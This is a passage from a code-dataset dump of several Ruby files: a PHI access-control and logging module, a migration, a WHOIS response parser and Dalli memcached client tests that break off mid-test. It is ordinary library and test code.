if options[:school_names_whitelist]
schools = options[:school_names_whitelist].map {|name| School.find_by_name(name) }
else
schools = School.all
end
puts("LOAD: Processing #{schools.size} schools...")
schools.each do |school|
puts("LOAD: School: #{school.name}...")
categories.each do |category|
school_category = SchoolCategory.for(school, category).first
if school_category.nil?
school_category = SchoolCategory.create!(school: school, category: category)
end
school_category.sync_aggregated_responses
end
end
puts('LOAD: Done.')
puts
puts
recipients = schools.flat_map {|school| school.recipients }
puts("Updating #{recipients.size} recipient counts...")
recipients.each { |r| r.update_counts }
puts('Done.')
end
end
| 36.909091 | 212 | 0.582284 |
4afdbeaa10152b824ac89ae6183663cde91655ca | 25,195 | # frozen_string_literal: true
# Namespace for classes and modules that handle PHI Attribute Access Logging
module PhiAttrs
# Module for extending ActiveRecord models to handle PHI access logging
# and restrict access to attributes.
#
# @author Apsis Labs
# @since 0.1.0
module PhiRecord
extend ActiveSupport::Concern
included do
class_attribute :__phi_exclude_methods
class_attribute :__phi_include_methods
class_attribute :__phi_extend_methods
class_attribute :__phi_methods_wrapped
class_attribute :__phi_methods_to_extend
after_initialize :wrap_phi
# These have to default to an empty array
self.__phi_methods_wrapped = []
self.__phi_methods_to_extend = []
end
class_methods do
# Set methods to be excluded from PHI access logging.
#
# @param [Array<Symbol>] *methods Any number of methods to exclude
#
# @example
# exclude_from_phi :foo, :bar
#
def exclude_from_phi(*methods)
self.__phi_exclude_methods = methods.map(&:to_s)
end
# Set methods to be explicitly included in PHI access logging.
#
# @param [Array<Symbol>] *methods Any number of methods to include
#
# @example
# include_in_phi :foo, :bar
#
def include_in_phi(*methods)
self.__phi_include_methods = methods.map(&:to_s)
end
# Set of methods which should be implicitly allowed if this object
# is allowed. The methods that are extended should return ActiveRecord
# models that also extend PhiAttrs.
#
# @param [Array<Symbol>] *methods Any number of methods to extend access to
#
# @example
# has_one :foo
# has_one :bar
# extend_phi_access :foo, :bar
#
def extend_phi_access(*methods)
self.__phi_extend_methods = methods.map(&:to_s)
end
# Enable PHI access for any instance of this class.
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
#
# @example
# Foo.allow_phi!('[email protected]', 'viewing patient record')
#
def allow_phi!(user_id = nil, reason = nil)
raise ArgumentError, 'block not allowed. use allow_phi with block' if block_given?
user_id ||= current_user
reason ||= i18n_reason
raise ArgumentError, 'user_id and reason cannot be blank' if user_id.blank? || reason.blank?
__phi_stack.push({
phi_access_allowed: true,
user_id: user_id,
reason: reason
})
PhiAttrs::Logger.tagged(PHI_ACCESS_LOG_TAG, name) do
PhiAttrs::Logger.info("PHI Access Enabled for '#{user_id}': #{reason}")
end
end
# Enable PHI access for any instance of this class in the block given only.
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
# @param [collection of PhiRecord] allow_only Specific PhiRecords to allow access to
# &block [block] The block in which PHI access is allowed for the class
#
# @example
# Foo.allow_phi('[email protected]', 'viewing patient record') do
# # PHI Access Allowed
# end
# # PHI Access Disallowed
#
# @example
# Foo.allow_phi('[email protected]', 'exporting patient list', allow_only: list_of_foos) do
# # PHI Access Allowed for `list_of_foo` only
# end
# # PHI Access Disallowed
#
def allow_phi(user_id = nil, reason = nil, allow_only: nil, &block)
get_phi(user_id, reason, allow_only: allow_only, &block)
return
end
# Enable PHI access for any instance of this class in the block given only
# returning whatever the block returns.
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
# @param [collection of PhiRecord] allow_only Specific PhiRecords to allow access to
# &block [block] The block in which PHI access is allowed for the class
#
# @example
# results = Foo.allow_phi('[email protected]', 'viewing patient record') do
# Foo.search(params)
# end
#
# @example
# loaded_foo = Foo.allow_phi('[email protected]', 'exporting patient list', allow_only: list_of_foos) do
# Bar.find_by(foo: list_of_foos).include(:foo)
# end
#
def get_phi(user_id = nil, reason = nil, allow_only: nil)
raise ArgumentError, 'block required' unless block_given?
if allow_only.present?
raise ArgumentError, 'allow_only must be iterable with each' unless allow_only.respond_to?(:each)
raise ArgumentError, "allow_only must all be `#{name}` objects" unless allow_only.all? { |t| t.is_a?(self) }
raise ArgumentError, 'allow_only must all have `allow_phi!` methods' unless allow_only.all? { |t| t.respond_to?(:allow_phi!) }
end
# Save this so we don't revoke access previously extended outside the block
frozen_instances = Hash[__instances_with_extended_phi.map { |obj| [obj, obj.instance_variable_get(:@__phi_relations_extended).clone] }]
if allow_only.nil?
allow_phi!(user_id, reason)
else
allow_only.each { |t| t.allow_phi!(user_id, reason) }
end
result = yield if block_given?
__instances_with_extended_phi.each do |obj|
if frozen_instances.include?(obj)
old_extensions = frozen_instances[obj]
new_extensions = obj.instance_variable_get(:@__phi_relations_extended) - old_extensions
obj.send(:revoke_extended_phi!, new_extensions) if new_extensions.any?
else
obj.send(:revoke_extended_phi!) # Instance is new to the set, so revoke everything
end
end
if allow_only.nil?
disallow_last_phi!
else
allow_only.each { |t| t.disallow_last_phi!(preserve_extensions: true) }
# We've handled any newly extended allowances ourselves above
end
result
end
# Explicitly disallow phi access in a specific area of code. This does not
# play nicely with the mutating versions of `allow_phi!` and `disallow_phi!`
#
# At the moment, this doesn't work at all, as the instance won't
# necessarily look at the class-level stack when determining if PHI is allowed.
#
# &block [block] The block in which PHI access is explicitly disallowed.
#
# @example
# # PHI Access Disallowed
# Foo.disallow_phi
# # PHI Access *Still* Disallowed
# end
# # PHI Access *Still, still* Disallowed
# Foo.allow_phi!('[email protected]', 'viewing patient record')
# # PHI Access Allowed
# Foo.disallow_phi do
# # PHI Access Disallowed
# end
# # PHI Access Allowed Again
def disallow_phi
raise ArgumentError, 'block required. use disallow_phi! without block' unless block_given?
__phi_stack.push({
phi_access_allowed: false
})
yield if block_given?
__phi_stack.pop
end
# Revoke all PHI access for this class, if enabled by PhiRecord#allow_phi!
#
# @example
# Foo.disallow_phi!
#
def disallow_phi!
raise ArgumentError, 'block not allowed. use disallow_phi with block' if block_given?
message = __phi_stack.present? ? "PHI access disabled for #{__user_id_string(__phi_stack)}" : 'PHI access disabled. No class level access was granted.'
__reset_phi_stack
PhiAttrs::Logger.tagged(PHI_ACCESS_LOG_TAG, name) do
PhiAttrs::Logger.info(message)
end
end
# Revoke last PHI access for this class, if enabled by PhiRecord#allow_phi!
#
# @example
# Foo.disallow_last_phi!
#
def disallow_last_phi!
raise ArgumentError, 'block not allowed' if block_given?
removed_access = __phi_stack.pop
message = removed_access.present? ? "PHI access disabled for #{removed_access[:user_id]}" : 'PHI access disabled. No class level access was granted.'
PhiAttrs::Logger.tagged(PHI_ACCESS_LOG_TAG, name) do
PhiAttrs::Logger.info(message)
end
end
# Whether PHI access is allowed for this class
#
# @example
# Foo.phi_allowed?
#
# @return [Boolean] whether PHI access is allowed for this instance
#
def phi_allowed?
__phi_stack.present? && __phi_stack[-1][:phi_access_allowed]
end
def __instances_with_extended_phi
RequestStore.store[:phi_instances_with_extended_phi] ||= Set.new
end
def __phi_stack
RequestStore.store[:phi_access] ||= {}
RequestStore.store[:phi_access][name] ||= []
end
def __reset_phi_stack
RequestStore.store[:phi_access] ||= {}
RequestStore.store[:phi_access][name] = []
end
def __user_id_string(access_list)
access_list ||= []
access_list.map { |c| "'#{c[:user_id]}'" }.join(',')
end
def current_user
RequestStore.store[:phi_attrs_current_user]
end
def i18n_reason
controller = RequestStore.store[:phi_attrs_controller]
action = RequestStore.store[:phi_attrs_action]
return nil if controller.blank? || action.blank?
i18n_path = [PhiAttrs.translation_prefix] + __path_to_controller_and_action(controller, action)
i18n_path.push(*__path_to_class)
i18n_key = i18n_path.join('.')
return I18n.t(i18n_key) if I18n.exists?(i18n_key)
locale = I18n.locale || I18n.default_locale
PhiAttrs::Logger.warn "No #{locale} PHI Reason found for #{i18n_key}"
end
# Converts a controller class name and action into I18n path segments,
# e.g. ('Admin::UsersController', 'show') => ['admin', 'users', 'show'].
def __path_to_controller_and_action(controller, action)
  module_paths = controller.underscore.split('/')
  class_name_parts = module_paths.pop.split('_')
  # Drop the conventional trailing 'controller' segment of the class name.
  class_name_parts.pop if class_name_parts[-1] == 'controller'
  module_paths.push(class_name_parts.join('_'), action)
end
# Converts this class's name into I18n path segments,
# e.g. 'MyModule::Foo' => ['my_module', 'foo'].
def __path_to_class
  module_paths = name.underscore.split('/')
  class_name_parts = module_paths.pop.split('_')
  module_paths.push(class_name_parts.join('_'))
end
end
# Get all method names to be wrapped with PHI access logging
#
# Starts from the model's attribute names, removes explicitly excluded
# methods, adds explicitly included ones, and never wraps the primary key
# (so record lookups work without a PHI grant).
#
# @return [Array<String>] the method names to be wrapped with PHI access logging
#
def __phi_wrapped_methods
  excluded_methods = self.class.__phi_exclude_methods.to_a
  included_methods = self.class.__phi_include_methods.to_a

  attribute_names - excluded_methods + included_methods - [self.class.primary_key]
end
# Get all method names to be wrapped with PHI access extension
# (relations whose returned records should inherit this record's grant).
#
# @return [Array<String>] the method names to be wrapped with PHI access extension
#
def __phi_extended_methods
  self.class.__phi_extend_methods.to_a
end
# Enable PHI access for a single instance of this class.
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
#
# @raise [ArgumentError] when a block is given, or when user_id/reason are
#   blank after falling back to the request-scoped defaults
#
# @example
#   foo = Foo.find(1)
#   foo.allow_phi!('[email protected]', 'viewing patient record')
#
def allow_phi!(user_id = nil, reason = nil)
  raise ArgumentError, 'block not allowed. use allow_phi with block' if block_given?

  # Fall back to the controller-provided user and translated reason.
  user_id ||= self.class.current_user
  reason ||= self.class.i18n_reason
  raise ArgumentError, 'user_id and reason cannot be blank' if user_id.blank? || reason.blank?

  PhiAttrs::Logger.tagged(*phi_log_keys) do
    @__phi_access_stack.push({
      phi_access_allowed: true,
      user_id: user_id,
      reason: reason
    })

    PhiAttrs::Logger.info("PHI Access Enabled for '#{user_id}': #{reason}")
  end
end
# Enable PHI access for a single instance of this class inside the block.
# Nested calls to allow_phi will log once per nested call
#
# Thin wrapper over #get_phi that discards the block's return value.
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
# @yield The block in which phi access is allowed
#
# @example
#   foo = Foo.find(1)
#   foo.allow_phi('[email protected]', 'viewing patient record') do
#     # PHI Access Allowed Here
#   end
#   # PHI Access Disallowed Here
#
def allow_phi(user_id = nil, reason = nil, &block)
  get_phi(user_id, reason, &block)
  nil
end
# Enable PHI access for a single instance of this class inside the block.
# Returns whatever is returned from the block.
# Nested calls to get_phi will log once per nested call
#
# @param [String] user_id A unique identifier for the person accessing the PHI
# @param [String] reason The reason for accessing PHI
# @yield The block in which phi access is allowed
#
# @return PHI
#
# @example
#   foo = Foo.find(1)
#   phi_data = foo.get_phi('[email protected]', 'viewing patient record') do
#     foo.phi_field
#   end
#
def get_phi(user_id = nil, reason = nil)
  raise ArgumentError, 'block required' unless block_given?

  # Snapshot which related instances already had PHI extended, so only the
  # extensions created inside this block are revoked afterwards.
  extended_instances = @__phi_relations_extended.clone
  allow_phi!(user_id, reason)
  begin
    yield
  ensure
    # Always revoke the grant made above, even when the block raises;
    # otherwise an exception would leave PHI access permanently enabled
    # on this instance.
    new_extensions = @__phi_relations_extended - extended_instances
    disallow_last_phi!(preserve_extensions: true)
    revoke_extended_phi!(new_extensions) if new_extensions.any?
  end
end
# Revoke all PHI access for a single instance of this class.
#
# Clears the entire instance-level access stack and revokes any PHI access
# that was extended to related records via this instance.
#
# @example
#   foo = Foo.find(1)
#   foo.disallow_phi!
#
def disallow_phi!
  raise ArgumentError, 'block not allowed. use disallow_phi with block' if block_given?

  PhiAttrs::Logger.tagged(*phi_log_keys) do
    # Capture who had access before the stack is wiped, for the log line.
    removed_access_for = self.class.__user_id_string(@__phi_access_stack)
    revoke_extended_phi!
    @__phi_access_stack = []
    message = removed_access_for.present? ? "PHI access disabled for #{removed_access_for}" : 'PHI access disabled. No instance level access was granted.'
    PhiAttrs::Logger.info(message)
  end
end
# Disables PHI access for a single instance of this class inside the block,
# temporarily overriding any instance- or class-level grants.
#
# @yield The block in which phi access is disallowed
#
# @example
#   foo = Foo.find(1)
#   foo.disallow_phi do
#     # PHI Access Disallowed Here
#   end
#   # Prior PHI access (if any) restored here
#
def disallow_phi
  raise ArgumentError, 'block required. use disallow_phi! without block' unless block_given?

  add_disallow_flag!
  add_disallow_flag_to_extended_phi!
  begin
    yield
  ensure
    # Remove the disallow flags even when the block raises, so the access
    # stacks are not left in a permanently disallowed state.
    remove_disallow_flag_from_extended_phi!
    remove_disallow_flag!
  end
end
# Revoke last PHI access for a single instance of this class.
#
# @param [Boolean] preserve_extensions when true, PHI access previously
#   extended to related records is kept (used internally by #get_phi)
#
# @example
#   foo = Foo.find(1)
#   foo.disallow_last_phi!
#
def disallow_last_phi!(preserve_extensions: false)
  raise ArgumentError, 'block not allowed' if block_given?

  PhiAttrs::Logger.tagged(*phi_log_keys) do
    removed_access = @__phi_access_stack.pop
    revoke_extended_phi! unless preserve_extensions
    message = removed_access.present? ? "PHI access disabled for #{removed_access[:user_id]}" : 'PHI access disabled. No instance level access was granted.'
    PhiAttrs::Logger.info(message)
  end
end
# The unique identifier for whom access has been allowed on this instance.
# This is what was passed in when PhiRecord#allow_phi! was called.
#
# NOTE(review): raises NoMethodError when no access has been granted
# (phi_context is nil) — confirm callers always check phi_allowed? first.
#
# @return [String] the user_id passed in to allow_phi!
#
def phi_allowed_by
  phi_context[:user_id]
end
# The access reason for allowing access to this instance.
# This is what was passed in when PhiRecord#allow_phi! was called.
#
# NOTE(review): like #phi_allowed_by, this raises NoMethodError when no
# access has been granted — confirm intended.
#
# @return [String] the reason passed in to allow_phi!
#
def phi_access_reason
  phi_context[:reason]
end
# Whether PHI access is allowed for a single instance of this class
# (instance-level grants take precedence over class-level ones).
#
# @example
#   foo = Foo.find(1)
#   foo.phi_allowed?
#
# @return [Boolean] whether PHI access is allowed for this instance
#
def phi_allowed?
  context = phi_context
  !context.nil? && context[:phi_access_allowed]
end
# Require phi access. Raises an error pre-emptively if it has not been granted.
#
# @raise [PhiAccessException] when neither allow_phi nor allow_phi! is in effect
#
# @example
#   def use_phi(patient_record)
#     patient_record.require_phi!
#     # ...use PHI Freely
#   end
#
def require_phi!
  return if phi_allowed?

  raise PhiAccessException, 'PHI Access required, please call allow_phi or allow_phi! first'
end
# Clears the relation-extension bookkeeping before delegating to
# ActiveRecord's reload, so freshly loaded relations are re-extended.
def reload
  @__phi_relations_extended.clear
  super
end
protected
# Pushes an explicit "access denied" frame onto this instance's access
# stack, shadowing any earlier grants until it is removed.
# @private since subject to change
def add_disallow_flag!
  @__phi_access_stack << { phi_access_allowed: false }
end
# removes the last item in instance internal stack.
# Counterpart to #add_disallow_flag!; used by the block form of disallow_phi.
# @private since subject to change
def remove_disallow_flag!
  @__phi_access_stack.pop
end
private
# Entry point for wrapping methods with PHI access logging. This is called
# by an `after_initialize` hook from ActiveRecord.
#
# @private
#
def wrap_phi
  # Disable PHI access by default
  @__phi_access_stack = []
  @__phi_methods_extended = Set.new
  @__phi_relations_extended = Set.new

  # Wrap attributes with PHI Logger and Access Control
  __phi_wrapped_methods.each { |m| phi_wrap_method(m) }
  __phi_extended_methods.each { |m| phi_wrap_extension(m) }
end
# Log Key for an instance of this class. If the instance is persisted in the
# database, then it is the primary key; otherwise it is the Ruby object_id
# in memory.
#
# This is used by the tagged logger for tagging all log entries to find
# the underlying model.
#
# @private
#
# @return [Array<String>] log key for an instance of this class
#
def phi_log_keys
  @__phi_log_id = persisted? ? "Key: #{attributes[self.class.primary_key]}" : "Object: #{object_id}"
  @__phi_log_keys = [PHI_ACCESS_LOG_TAG, self.class.name, @__phi_log_id]
end
# Innermost active access frame: instance-level grants take precedence
# over class-level ones. Nil when no access has been granted.
def phi_context
  instance_phi_context || class_phi_context
end
# Newest frame on this instance's access stack, or nil.
def instance_phi_context
  @__phi_access_stack && @__phi_access_stack[-1]
end
# Newest frame on the class-level access stack, or nil.
def class_phi_context
  self.class.__phi_stack[-1]
end
# The unique identifiers for everything with access allowed on this instance.
#
# @private
#
# @return String of all the user_id's passed in to allow_phi!
#
def all_phi_allowed_by
  self.class.__user_id_string(all_phi_context)
end
# All active access frames for this instance: the instance stack followed
# by the class-level stack.
def all_phi_context
  (@__phi_access_stack || []) + (self.class.__phi_stack || [])
end
# Whether every active access frame has already produced an access log line
# (used to avoid duplicate log entries for the same grant).
def all_phi_context_logged?
  all_phi_context.all? { |v| v[:logged] }
end
# Marks every active access frame as logged.
def set_all_phi_context_logged
  all_phi_context.each { |c| c[:logged] = true }
end
# Core logic for wrapping methods in PHI access logging and access restriction.
#
# This method takes a single method name, and creates a new method using
# define_method; once this method is defined, the original method name
# is aliased to the new method, and the original method is renamed to a
# known key.
#
# @private
#
# @example
#   Foo::phi_wrap_method(:bar)
#
#   foo = Foo.find(1)
#   foo.bar # => raises PHI Access Exception
#
#   foo.allow_phi!('[email protected]', 'testing')
#
#   foo.bar # => returns original value of Foo#bar
#
#   # defines two new methods:
#   #   __bar_phi_wrapped
#   #   __bar_phi_unwrapped
#   #
#   # After these methods are defined
#   # an alias chain is created that
#   # roughly maps:
#   #
#   # bar => __bar_phi_wrapped => __bar_phi_unwrapped
#   #
#   # This ensures that all calls to Foo#bar pass
#   # through access logging.
#
def phi_wrap_method(method_name)
  # Guard against double-wrapping (wrap_phi runs on every initialize).
  return if self.class.__phi_methods_wrapped.include? method_name

  wrapped_method = :"__#{method_name}_phi_wrapped"
  unwrapped_method = :"__#{method_name}_phi_unwrapped"

  self.class.send(:define_method, wrapped_method) do |*args, &block|
    PhiAttrs::Logger.tagged(*phi_log_keys) do
      # NOTE(review): @__phi_user_id does not appear to be assigned anywhere
      # in this file, so the interpolation below is likely always blank —
      # confirm the intended message.
      raise PhiAttrs::Exceptions::PhiAccessException, "Attempted PHI access for #{self.class.name} #{@__phi_user_id}" unless phi_allowed?

      # Log at most once per grant, on the first wrapped-method call.
      unless all_phi_context_logged?
        PhiAttrs::Logger.info("#{self.class.name} access by [#{all_phi_allowed_by}]. Triggered by method: #{method_name}")
        set_all_phi_context_logged
      end
      send(unwrapped_method, *args, &block)
    end
  end

  # method_name => wrapped_method => unwrapped_method
  self.class.send(:alias_method, unwrapped_method, method_name)
  self.class.send(:alias_method, method_name, wrapped_method)

  self.class.__phi_methods_wrapped << method_name
end
# Core logic for wrapping methods in PHI access extensions. Almost
# functionally equivalent to the phi_wrap_method call above,
# this method doesn't add any logging or access restriction, but
# simply proxies the PhiRecord#allow_phi! call.
#
# @private
#
def phi_wrap_extension(method_name)
  # Guard against double-wrapping (wrap_phi runs on every initialize).
  return if self.class.__phi_methods_to_extend.include? method_name

  wrapped_method = wrapped_extended_name(method_name)
  unwrapped_method = unwrapped_extended_name(method_name)

  self.class.send(:define_method, wrapped_method) do |*args, &block|
    relation = send(unwrapped_method, *args, &block)

    # Propagate this instance's grant to returned PhiRecord relations,
    # remembering which ones were extended so access can be revoked later.
    if phi_allowed?
      if relation.present? && relation_klass(relation).included_modules.include?(PhiRecord)
        relations = relation.is_a?(Enumerable) ? relation : [relation]
        relations.each do |r|
          r.allow_phi!(phi_allowed_by, phi_access_reason) unless @__phi_relations_extended.include?(r)
        end
        @__phi_relations_extended.merge(relations)
        self.class.__instances_with_extended_phi.add(self)
      end
    end

    relation
  end

  # method_name => wrapped_method => unwrapped_method
  self.class.send(:alias_method, unwrapped_method, method_name)
  self.class.send(:alias_method, method_name, wrapped_method)

  self.class.__phi_methods_to_extend << method_name
end
# Revoke PHI access for all `extend`ed relations (or only those given)
def revoke_extended_phi!(relations = nil)
  relations ||= @__phi_relations_extended
  relations.each do |relation|
    relation.disallow_last_phi! if relation.present? && relation_klass(relation).included_modules.include?(PhiRecord)
  end
  # Forget the revoked relations so a later call can re-extend them.
  @__phi_relations_extended.subtract(relations)
end
# Adds a disallow PHI access flag (block syntax) to all `extend`ed relations (or only those given)
def add_disallow_flag_to_extended_phi!(relations = nil)
  relations ||= @__phi_relations_extended
  relations.each do |relation|
    relation.add_disallow_flag! if relation.present? && relation_klass(relation).included_modules.include?(PhiRecord)
  end
end
# Removes the disallow PHI access flag from all `extend`ed relations (or only those given)
def remove_disallow_flag_from_extended_phi!(relations = nil)
  relations ||= @__phi_relations_extended
  relations.each do |relation|
    relation.remove_disallow_flag! if relation.present? && relation_klass(relation).included_modules.include?(PhiRecord)
  end
end
# Resolves the model class behind a relation-like value: an AR relation's
# target class, the class of an enumerable's first element, or the value's
# own class.
def relation_klass(rel)
  case rel
  when ActiveRecord::Relation then rel.klass
  when Enumerable then rel.first.class
  else rel.class
  end
end
# Name of the generated wrapper for a PHI-extended relation method.
def wrapped_extended_name(method_name)
  "__#{method_name}_phi_access_extended".to_sym
end
# Name under which the original relation method is preserved.
def unwrapped_extended_name(method_name)
  "__#{method_name}_phi_access_original".to_sym
end
end
end
| 34.372442 | 160 | 0.646557 |
7a6c5f422f597cf8a2e2c9652ccc6f0bb0f526ee | 184 | class AddCachedVotesColumnToSite < ActiveRecord::Migration
def change
add_column :sites, :cached_votes_up, :integer, default: 0
add_index :sites, :cached_votes_up
end
end
| 26.285714 | 61 | 0.766304 |
1a5bcf6426d712e69f746f81b33b9bb56be9016d | 2,044 | #
# = Ruby Whois
#
# An intelligent pure Ruby WHOIS client and parser.
#
#
# Category:: Net
# Package:: Whois
# Author:: Simone Carletti <[email protected]>
# License:: MIT License
#
#--
#
#++
require 'whois/answer/parser/base'
module Whois
  class Answer
    class Parser

      #
      # = whois.nic.mx parser
      #
      # Parser for the whois.nic.mx server.
      #
      # NOTE: This parser is just a stub and provides only a few basic methods
      # to check for domain availability and get domain status.
      # Please consider to contribute implementing missing methods.
      # See WhoisNicIt parser for an explanation of all available methods
      # and examples.
      #
      class WhoisNicMx < Base

        # :available when the response reports Object_Not_Found,
        # :registered otherwise.
        property_supported :status do
          @status ||= if available?
            :available
          else
            :registered
          end
        end

        # The server answers "Object_Not_Found" for unregistered domains.
        property_supported :available? do
          @available ||= !!(content_for_scanner =~ /Object_Not_Found/)
        end

        property_supported :registered? do
          !available?
        end


        property_supported :created_on do
          @created_on ||= if content_for_scanner =~ /Created On:\s+(.*)\n/
            Time.parse($1)
          end
        end

        # FIXME: the response contains localized data
        # Expiration Date: 10-may-2011
        # Last Updated On: 15-abr-2010 <--
        # property_supported :updated_on do
        #   @updated_on ||= if content_for_scanner =~ /Last Updated On:\s+(.*)\n/
        #     Time.parse($1)
        #   end
        # end

        # NOTE: subject to the same localized-month caveat as updated_on above.
        property_supported :expires_on do
          @expires_on ||= if content_for_scanner =~ /Expiration Date:\s+(.*)\n/
            Time.parse($1)
          end
        end

        # Extracts "DNS: host" entries from the "Name Servers:" section;
        # empty array when the section is missing.
        property_supported :nameservers do
          @nameservers ||= if content_for_scanner =~ /Name Servers:\n((.+\n)+)\n/
            $1.scan(/DNS:\s+(.*)\n/).flatten.map(&:strip)
          else
            []
          end
        end

      end

    end
  end
end
| 23.227273 | 81 | 0.557241 |
ab21084733c6ce746cbc6b5f7e0f3581febab5b5 | 20,892 | # frozen_string_literal: true
require_relative "helper"
require "openssl"
require "securerandom"
describe "Dalli" do
# Option normalization and socket selection behavior of Dalli::Client.new.
describe "options parsing" do
  it "handle deprecated options" do
    dc = Dalli::Client.new("foo", compression: true)
    assert dc.instance_variable_get(:@options)[:compress]
    refute dc.instance_variable_get(:@options)[:compression]
  end

  it "not warn about valid options" do
    dc = Dalli::Client.new("foo", compress: true)
    # Rails.logger.expects :warn
    assert dc.instance_variable_get(:@options)[:compress]
  end

  it "raises error with invalid expires_in" do
    bad_data = [{bad: "expires in data"}, Hash, [1, 2, 3]]
    bad_data.each do |bad|
      assert_raises ArgumentError do
        Dalli::Client.new("foo", {expires_in: bad})
      end
    end
  end

  it "return string type for namespace attribute" do
    dc = Dalli::Client.new("foo", namespace: :wunderschoen)
    assert_equal "wunderschoen", dc.send(:namespace)
    dc.close

    dc = Dalli::Client.new("foo", namespace: proc { :wunderschoen })
    assert_equal "wunderschoen", dc.send(:namespace)
    dc.close
  end

  it "raises error with invalid digest_class" do
    assert_raises ArgumentError do
      Dalli::Client.new("foo", {expires_in: 10, digest_class: Object})
    end
  end

  it "opens a standard TCP connection" do
    memcached_persistent do |dc|
      server = dc.send(:ring).servers.first
      sock = Dalli::Socket::TCP.open(server.hostname, server.port, server, server.options)
      assert_equal Dalli::Socket::TCP, sock.class

      dc.set("abc", 123)
      assert_equal(123, dc.get("abc"))
    end
  end

  it "opens a SSL TCP connection" do
    memcached_ssl_persistent do |dc|
      server = dc.send(:ring).servers.first
      sock = Dalli::Socket::TCP.open(server.hostname, server.port, server, server.options)
      assert_equal Dalli::Socket::SSLSocket, sock.class

      dc.set("abc", 123)
      assert_equal(123, dc.get("abc"))
    end
  end
end
# Whitespace-only keys are legal; empty/nil keys are rejected; overlong
# keys get hashed+truncated.
describe "key validation" do
  it "not allow blanks" do
    memcached_persistent do |dc|
      dc.set " ", 1
      assert_equal 1, dc.get(" ")
      dc.set "\t", 1
      assert_equal 1, dc.get("\t")
      dc.set "\n", 1
      assert_equal 1, dc.get("\n")
      assert_raises ArgumentError do
        dc.set "", 1
      end
      assert_raises ArgumentError do
        dc.set nil, 1
      end
    end
  end

  it "allow namespace to be a symbol" do
    memcached_persistent do |_, port|
      dc = Dalli::Client.new("localhost:#{port}", namespace: :wunderschoen)
      dc.set "x" * 251, 1
      # NOTE(review): `assert 1, ...` only asserts the truthiness of 1 and
      # ignores the second argument; probably meant assert_equal — confirm.
      assert 1, dc.get("#{"x" * 200}:md5:#{Digest::MD5.hexdigest("x" * 251)}")
    end
  end
end
# TTL arguments must respond to #to_i.
describe "ttl validation" do
  it "generated an ArgumentError for ttl that does not support to_i" do
    memcached_persistent do |dc|
      assert_raises ArgumentError do
        dc.set("foo", "bar", [])
      end
    end
  end
end
# Server-list argument parsing: default host, comma-separated strings,
# arrays, and rejection of Hash arguments.
it "default to localhost:11211" do
  dc = Dalli::Client.new
  ring = dc.send(:ring)
  s1 = ring.servers.first.hostname
  assert_equal 1, ring.servers.size
  dc.close

  dc = Dalli::Client.new("localhost:11211")
  ring = dc.send(:ring)
  s2 = ring.servers.first.hostname
  assert_equal 1, ring.servers.size
  dc.close

  dc = Dalli::Client.new(["localhost:11211"])
  ring = dc.send(:ring)
  s3 = ring.servers.first.hostname
  assert_equal 1, ring.servers.size
  dc.close

  assert_equal "127.0.0.1", s1
  assert_equal s2, s3
end

it "accept comma separated string" do
  dc = Dalli::Client.new("server1.example.com:11211,server2.example.com:11211")
  ring = dc.send(:ring)
  assert_equal 2, ring.servers.size
  s1, s2 = ring.servers.map(&:hostname)
  assert_equal "server1.example.com", s1
  assert_equal "server2.example.com", s2
end

it "accept array of servers" do
  dc = Dalli::Client.new(["server1.example.com:11211", "server2.example.com:11211"])
  ring = dc.send(:ring)
  assert_equal 2, ring.servers.size
  s1, s2 = ring.servers.map(&:hostname)
  assert_equal "server1.example.com", s1
  assert_equal "server2.example.com", s2
end

it "raises error when servers is a Hash" do
  assert_raises ArgumentError do
    Dalli::Client.new({hosts: "server1.example.com"})
  end
end
# Integration tests against a real memcached started by the test helper
# (memcached_persistent / memcached_ssl_persistent).
describe "using a live server" do
  it "support get/set" do
    memcached_persistent do |dc|
      dc.flush

      val1 = "1234567890" * 999999
      dc.set("a", val1)
      val2 = dc.get("a")
      assert_equal val1, val2

      assert op_addset_succeeds(dc.set("a", nil))
      assert_nil dc.get("a")
    end
  end

  it "supports delete" do
    memcached_persistent do |dc|
      dc.set("some_key", "some_value")
      assert_equal "some_value", dc.get("some_key")

      dc.delete("some_key")
      assert_nil dc.get("some_key")
    end
  end

  it "returns nil for nonexist key" do
    memcached_persistent do |dc|
      assert_nil dc.get("notexist")
    end
  end

  it 'allows "Not found" as value' do
    memcached_persistent do |dc|
      dc.set("key1", "Not found")
      assert_equal "Not found", dc.get("key1")
    end
  end

  it "support stats" do
    memcached_persistent do |dc|
      # make sure that get_hits would not equal 0
      dc.set(:a, "1234567890" * 100000)
      dc.get(:a)

      stats = dc.stats
      servers = stats.keys
      assert(servers.any? { |s|
        stats[s]["get_hits"].to_i != 0
      }, "general stats failed")

      stats_items = dc.stats(:items)
      servers = stats_items.keys
      assert(servers.all? { |s|
        stats_items[s].keys.any? do |key|
          key =~ /items:[0-9]+:number/
        end
      }, "stats items failed")

      stats_slabs = dc.stats(:slabs)
      servers = stats_slabs.keys
      assert(servers.all? { |s|
        stats_slabs[s].keys.any? do |key|
          key == "active_slabs"
        end
      }, "stats slabs failed")

      # reset_stats test
      results = dc.reset_stats
      assert(results.all? { |x| x })
      stats = dc.stats
      servers = stats.keys

      # check if reset was performed
      servers.each do |s|
        assert_equal 0, dc.stats[s]["get_hits"].to_i
      end
    end
  end

  it "support the fetch operation" do
    memcached_persistent do |dc|
      dc.flush

      expected = {"blah" => "blerg!"}
      executed = false
      value = dc.fetch("fetch_key") {
        executed = true
        expected
      }
      assert_equal expected, value
      assert_equal true, executed

      # Second fetch hits the cache; the block must not run again.
      executed = false
      value = dc.fetch("fetch_key") {
        executed = true
        expected
      }
      assert_equal expected, value
      assert_equal false, executed
    end
  end

  it "support the fetch operation with falsey values" do
    memcached_persistent do |dc|
      dc.flush

      dc.set("fetch_key", false)
      res = dc.fetch("fetch_key") { flunk "fetch block called" }
      assert_equal false, res
    end
  end

  it "support the fetch operation with nil values when cache_nils: true" do
    memcached_persistent(21345, cache_nils: true) do |dc|
      dc.flush
      dc.set("fetch_key", nil)
      res = dc.fetch("fetch_key") { flunk "fetch block called" }
      assert_nil res
    end

    # With cache_nils disabled a stored nil is treated as a miss.
    memcached_persistent(21345, cache_nils: false) do |dc|
      dc.flush
